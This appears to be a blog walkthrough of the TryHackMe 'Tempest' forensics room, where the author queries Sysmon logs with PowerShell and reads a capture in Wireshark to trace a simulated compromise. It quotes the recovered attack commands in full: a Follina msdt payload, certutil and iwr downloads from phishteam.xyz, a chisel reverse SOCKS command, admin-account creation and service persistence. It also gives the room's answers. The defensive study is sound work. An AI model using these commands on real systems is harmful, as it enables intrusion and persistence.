TL;DR walkthrough of the TryHackMe Tempest room.
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
WGU gave me a CISM voucher after I finished up my Masters in Cybersecurity and Information Assurance in April this year. I got the Sybex book and indexed the book as I read it. I picked that habit up while studying for SANS exams. If you’re curious then read Lesley Carhart’s explanation of SANS indexing here, they did a far better job explaining the process then I could.
I passed the CISM exam last Friday and am quite glad it’s over. The material was mind numbingly boring and the exam left me with a very poor impression of ISACA. JMHO but if you want to learn about GRC and take a respectable exam then do ISC2’s CISSP.
After that I needed to get in some quality time on the keyboard and ran to TryHackMe as therapy.
I am not a forensics guy at all. If you want a good writeup of a solid method than read a walkthrough like this one. I leaned on their writeup for some hints.
This walkthrough is about solving the Tempest room using nothing but PowerShell, WireShark, and a little guess work while getting some practice in with Sysmon. It is not a forensics howto.
I did a walkthrough of TryHackMe’s Sysmon room in the Cyber Defense Pathway here. My cheatsheet of Sysmon IDs matched to event type came in really handy in this room.
+----+----------------------------------------+
| # | Sysmon Event |
+----+----------------------------------------+
| 1 | Process creation |
| 3 | Network connection |
| 5 | Process terminated |
| 7 | Image loaded |
| 8 | CreateRemoteThread |
| 9 | RawAccessRead |
| 10 | ProcessAccess |
| 11 | FileCreate |
| 12 | RegistryEvent (Object create & delete) |
| 13 | RegistryEvent (Value Set) |
| 14 | RegistryEvent (Key & Value Rename) |
| 15 | FileCreateStreamHash |
| 22 | DNSEvent (DNS query) |
+----+----------------------------------------+Well I rambled enough, let’s connect to the VM and get into finding the answers.
xfreerdp /v:10.10.73.203 /u:user /p:Investigatem3! /dynamic-resolution— — Task 1 — -
I have successfully connected to the Virtual Machine.
No answer needed
— — Task 2 — -
I have read and understood the concept of Log Analysis and Event Correlation.
No answer needed
— — Task 3 — -
All three questions in this section are answered by a simple ForEach loop.
$Files = Get-ChildItem 'C:\Users\user\Desktop\Incident Files'
ForEach($File in $Files)
{
Get-FileHash $File -Algorithm SHA256
}What is the SHA256 hash of the capture.pcapng file?
CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6
What is the SHA256 hash of the sysmon.evtx file?
665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F
What is the SHA256 hash of the windows.evtx file?
D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60
— — Task 4 — -
The user of this machine was compromised by a malicious document. What is the file name of the document?
I simply searched the Sysmon event file for “*.doc*” and stumbled on this one.
$Events = Get-WinEvent -Path 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' | Where-Object {$_.Properties.Value -like "*doc*"} | Select-Object TimeCreated, ID, @{Name="Message";Expression={ $_.Properties.Value }}
ForEach($Event in $Events)
{
Write-Host " "
$Event.TimeCreated
$Event.ID
$Event.Properties.Value
Write-Host " "
}The original malware was:
free_magicules.doc
In the process of finding that, I also found the URL http://phishteam.xyz/02dcf07/free_magicules.doc was accessed by TEMPEST\\benimaru, which answered more questions below.
What is the name of the compromised user and machine?
Format: username-machine name
I found the answer to the Base64 question first, looked at the events next to it, then worked backwards to find these three answers.
benimaru-TEMPEST
What is the PID of the Microsoft Word process that opened the malicious document?
496
Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?
Get-WinEvent -Path ‘C:\Users\user\Desktop\Incident Files\sysmon.evtx’ | Where-Object {$_.Properties.Value -like “*phishteam.xyz*”}167.71.199.191
What is the base64 encoded string in the malicious payload executed by the document?
I went with a hunch on this one. I have noticed that THM likes to use Base64 encoded PowerShell commands in their investigation rooms. They are also fans of the shorthand version of the Invoke-Expression command; iex. I should have also added Invoke-WebRequest and iwr to this query, but I found the answer regardless.
$Fishy = Get-WinEvent -Path 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' | Where-Object {($_.Properties.Value -like "*-EncodedCommand*") -or ($_.Properties.Value -like "*Invoke-Command*") -or ($_.Properties.Value -like "*iex*")}
($Fishy).Properties.ValueC:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param “IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression(‘[System.Text.Encoding]’+[char]58+[char]58+’UTF8.GetString([System.Convert]’+[char]58+[char]58+’FromBase64String(‘+[char]34+’JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==’+[char]34+’))’))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe”
This Base64 decodes to:
$app=[Environment]::GetFolderPath(‘ApplicationData’);cd “$app\Microsoft\Windows\Start Menu\Programs\Startup”; iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip; Expand-Archive .\update.zip -DestinationPath .; rm update.zip;
However the exact answer THM is looking for here is:
JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==
What is the CVE number of the exploit used by the attacker to achieve a remote code execution?
Format: XXXX-XXXXX
This malware via Word document attack looked suspiciously like the recent Follina, so on a hunch I Googled that.
2022–30190
— — Task 5 — -
The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?
We already found this in the $app variable earlier.
C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user?
Format: Remove the double quotes from the log.
Querying based on what we know so far; first.exe is malicious, the attackers like PowerShell, and the original malware came from http://phishteam.xyz
$Events = Get-WinEvent -Path ‘C:\Users\user\Desktop\Incident Files\sysmon.evtx’ | Where-Object {($_.Properties.Value -like “*PowerShell*”) -and ($_.Properties.Value -like “*phishteam*”) -and ($_.Properties.Value -like “*first.exe*”) }“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w hidden -noni certutil -urlcache -split -f ‘http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe
This is one of the things that irks me about THM sometimes. Their question is a tad misleading. DO NOT remove the double quotes above. The entire thing above starting with “ and ending with \first.exe is the answer THM wants.
On a sidenote, I queried for what was created in that path.
$Events = Get-WinEvent -Path ‘C:\Users\user\Desktop\Incident Files\sysmon.evtx’ | Where-Object {($_.ID -eq “11”) -and ($_.Properties.Value -like “*C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup*”) }Created in AppData, apparently from the malicious zip:
C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk
Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution?
Look for first.exe and SHA256, or just see the answer above as it also contained the SHA256 hash.
$Events = Get-WinEvent -Path ‘C:\Users\user\Desktop\Incident Files\sysmon.evtx’ | Where-Object {($_.Properties.Value -like “*first.exe*”) -and ($_.Properties.Value -like “*sha256*”) }CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8
The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker?
Format: domain:port
Look for the file name from the previous question and Sysmon ID 22
$Events = Get-WinEvent -Path ‘C:\Users\user\Desktop\Incident Files\sysmon.evtx’ | Where-Object {($_.ID -eq “22”) -and ($_.Properties.Value -like “*first.exe*”) }We see 27 events where first.exe queried DNS server resolvecyber.xyz related to IP 167.71.222.162, so let’s query:
$Events = Get-WinEvent -Path ‘C:\Users\user\Desktop\Incident Files\sysmon.evtx’ | Where-Object { ($_.ID -eq “3”) -and ($_.Properties.Value -like “*167.71.222.162*”) -and ($_.Properties.Value -like “*first.exe*”) }We get 27 instances that look like this:
8948
C:\Users\Public\Downloads\first.exe
TEMPEST\benimaru
tcp
True
False
192.168.254.107
TEMPEST
51962
-
False
167.71.222.162
-
80
httpSo the answer should be resolvecyber.xyz:80
— — Task 6 — -
Start by looking for resolvecyber.xyz, phishteam.xyz, and our malicious doc file.
$Events = Get-WinEvent -Path ‘C:\Users\user\Desktop\Incident Files\sysmon.evtx’ | Where-Object { (($_.Properties.Value -like “*phishteam.xyz*”) -or ($_.Properties.Value -like “*resolvecyber.xyz*”)) -and ($_.Properties.Value -like “*free_magicules.doc*”) }http://phishteam.xyz/02dcf07/free_magicules.doc
Find C2 traffic in the pcap with the search
(“ip.addr==192.168.254.107 && ip.addr==167.71.222.162”) && httpExport all objects from HTTP.
index.html is the only 4 character file extension except *.cr3x in the results. THM wants an answer with a 4 character file extension, so that one is obvious.
http && frame contains “index.html”http://phishteam.xyz/02dcf07/index.html
Note that we could also simply search the known bad name & the victim’s IP we found back in Tasks 4 and 5:
ip.addr==192.168.254.107 && frame contains “phishteam”and we see all the file names that were downloaded to the victim.
The attackers IP hosting the malware is 167.71.199.191
ip.addr==192.168.254.107 && ip.addr==167.71.199.191We see an encrypted connection, so let’s try the other IP.
(ip.addr==192.168.254.107 && ip.addr==167.71.222.162) && httpScroll down a bit and we notice what looks like Base64. I copy/pasted and Base64 decoded it to find the answers in Task 7.
What is the URL of the malicious payload embedded in the document?
http://phishteam.xyz/02dcf07/index.html
What is the encoding used by the attacker on the c2 connection?
Base64
The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?
q
The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?
/9ab62b5?
What is the HTTP method used by the binary?
GET
Based on the user agent, what programming language was used by the attacker to compile the binary?
Format: Answer in lowercase
Nim
— Task 7 — -
In Wireshark we saw traffic like this.
I pulled the Base64 traffic out using Brim, fed it into base64decode.org, stripped out the junk, and got this.
cat C:\Users\Benimaru\Desktop\automation.ps1 - $user = "TEMPEST\benimaru"
$pass = "infernotempest"
$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePasswordpowershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe netstat -ano -p tcp -
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5508
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 4964
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 476
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1212
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1760
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2424
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 624
TCP 0.0.0.0:49676 0.0.0.0:0 LISTENING 608
TCP 192.168.254.107:139 0.0.0.0:0 LISTENING 4
TCP 192.168.254.107:51802 52.139.250.253:443 ESTABLISHED 3216
TCP 192.168.254.107:51839 34.104.35.123:80 TIME_WAIT 0
TCP 192.168.254.107:51858 104.101.22.128:80 TIME_WAIT 0
TCP 192.168.254.107:51860 20.205.146.149:443 TIME_WAIT 0
TCP 192.168.254.107:51861 204.79.197.200:443 ESTABLISHED 4352
TCP 192.168.254.107:51871 20.190.144.169:443 TIME_WAIT 0
TCP 192.168.254.107:51876 52.178.17.2:443 ESTABLISHED 4388
TCP 192.168.254.107:51878 20.60.178.36:443 ESTABLISHED 4388
TCP 192.168.254.107:51881 52.109.124.115:443 ESTABLISHED 4388
TCP 192.168.254.107:51882 52.139.154.55:443 ESTABLISHED 4388
TCP 192.168.254.107:51884 40.119.211.203:443 ESTABLISHED 4388
TCP 192.168.254.107:51895 52.152.90.172:443 ESTABLISHED 5508
TCP 192.168.254.107:51896 20.44.229.112:443 ESTABLISHED 8904The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?
infernotempest
The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?
WinRM uses 5985, which is shown when the attacker runs netstat -ano -p
The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection?
Format: Remove the double quotes from the log.
That’s a hint, the answer is in the logs. Search sysmon.evtx for ch.exe
$Events = Get-WinEvent -Path 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' | Where-Object {$_.Properties.Value -like "*ch.exe*"} | Select-Object TimeCreated, ID, @{Name="Message";Expression={ $_.Properties.Value }}
ForEach($Event in $Events)
{
Write-Host " "
$Event.TimeCreated
$Event.ID
$Event.Properties.Value
$Event.Message
Write-Host " "
}C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks
What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?
SHA256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451
What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.
chisel
The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate?
Format: Answer in lowercase
Query for binimuru events that happened after the SOCKS connection
$Events = Get-WinEvent -Path 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' | Where-Object {($_.TimeCreated -gt "6/20/2022 5:18:50 PM") -and ($_.UserID -eq "S-1–5–18") -and ($_.Id -eq "1")}
($Events | Select-Object -Last 1).Properties2022–06–20 17:19:06.492
4bbef3ae-ac0a-62b0-b00a-000000000700
4208
C:\Windows\System32\wsmprovhost.exe
10.0.17763.1 (WinBuild.160101.0800)
Host process for WinRM plug-ins
Microsoft® Windows® Operating System
Microsoft Corporation
wsmprovhost.exe
C:\Windows\system32\wsmprovhost.exe -Embedding
C:\Windows\system32\
TEMPEST\benimaruThe answer THM is looking for is “WinRM”
On a sidenote; notice the SOCKS connection details:
Monday, June 20, 2022 5:18:50 PM
7388
C:\Users\benimaru\Downloads\ch.exe
TEMPEST\benimaru
tcp
True
False
192.168.254.107
TEMPEST
51988
-
False
167.71.199.191
-
8080— — Task 8 — -
After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary?
Format: binary name,SHA256 hash
We’ll go on a hunch; so far THM has liked using PowerShell and ‘iwr’ [shorthand for Invoke-WebRequest] to download stuff. So let’s look for file creations after the timestamp from earlier using the victim user’s SID and containing “iwr” in the log entry:
$Events = Get-WinEvent -Path 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' | Where-Object {($_.TimeCreated -gt "6/20/2022 5:18:50 PM") -and ($_.UserID -eq "S-1–5–18") -and ($_.Properties.Value -like "*iwr*")}
$Events.PropertiesBingo, we get 3 events in the logs. spf.exe was downloaded first, followed by final.exe.
The problem is the hash value shown is for PowerShell, the program that ran. We need a log entry showing spf.exe having been run, so:
$Events = Get-WinEvent -Path 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' | Where-Object {($_.TimeCreated -gt "6/20/2022 5:18:50 PM") -and ($_.UserID -eq "S-1–5–18") -and ($_.Properties.Value -like "*iwr*")}
$Events.Propertiesand we get it:
SHA256=8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D
Hence the exact answer that THM is looking for here is:
spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D
Based on the SHA256 hash of the binary, what is the name of the tool used?
Format: Answer in lowercase
PrintSpoofer
The tool exploits a specific privilege owned by the user. What is the name of the privilege?
Google quickly leads to the author’s GitHub hosting PrintSpoofer. The readme states
“From LOCAL/NETWORK SERVICE to SYSTEM by abusing
SeImpersonatePrivilegeon Windows 10 and Server 2016/2019.”
SeImpersonatePrivilege
Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?
final.exe
The binary connects to a different port from the first c2 connection. What is the port used?
Look for connections and final.exe
$Events = Get-WinEvent -Path 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' | Where-Object {($_.TimeCreated -gt "6/20/2022 5:18:50 PM") -and ($_.UserID -eq "S-1–5–18") -and ($_.Properties.Value -like "*final.exe*") -and ($_.Id -eq "3")}
$Events.Properties
($Events | Select-Object -Last 1).Properties8080
— — Task 9 — -
Upon achieving SYSTEM access, the attacker then created two users. What are the account names?
Format: Answer in alphabetical order — comma delimited
Look for “net user” to find schion’s password being changed.
$Events = Get-WinEvent -Path ‘C:\Users\user\Desktop\Incident Files\sysmon.evtx’ | Where-Object {($_.TimeCreated -gt “6/20/2022 5:18:50 PM”) -and ($_.UserID -eq “S-1–5–18”) -and ($_.Properties.Value -like “*user /add*”)}shion, shuna
Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?
/add
Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?
4720
The attacker added one of the accounts in the local administrator’s group. What is the command used by the attacker?
$Events = Get-WinEvent -Path 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' | Where-Object {($_.TimeCreated -gt "6/20/2022 5:18:50 PM") -and ($_.UserID -eq "S-1–5–18") -and (($_.Properties.Value -like "*shion*") -or ($_.Properties.Value -like "*shuna*")) -and ($_.Properties.Value -like "*Administrators*")}
$Events.Count
$Events.Propertiesnet localgroup administrators /add shion
Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?
4732
After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this?
Format: Remove the double quotes from the log.
We’re going to make an educated guess that this is going to involve final.exe and a scheduled task:
$Events = Get-WinEvent -Path 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' | Where-Object {($_.TimeCreated -gt "6/20/2022 5:18:50 PM") -and ($_.UserID -eq "S-1–5–18") -and ($_.Properties.Value -like "*final.exe*") -and ($_.Properties.Value -like "*final.exe*") -and ($_.Properties.Value -like "*sc.exe*")}“C:\Windows\system32\sc.exe” \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto
Summary
This was a good room overall and more good practice with querying Sysmon events. I hadn’t used Brim before either and it’d been awhile since I had messed with Wireshark.
It’s good to get back to doing hands on things. I don’t think I’m doing another head in the clouds theory exam anytime soon. That was traumatic.
References
Good walkthrough of this room: https://medium.com/@m0_4de1/tempest-challenge-write-up-tryhackme-abae7d53b9a7
My previous Sysmon howto: https://happycamper84.medium.com/sysmon-tryhackme-walkthrough-d959de4636f1
Event ID 4720 user account created: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4720
Event ID 4732 member added to a security group: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732
Net user command: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771865(v=ws.11)
Follina, CVE-2022–30190: https://www.hackthebox.com/blog/cve-2022-30190-follina-explained
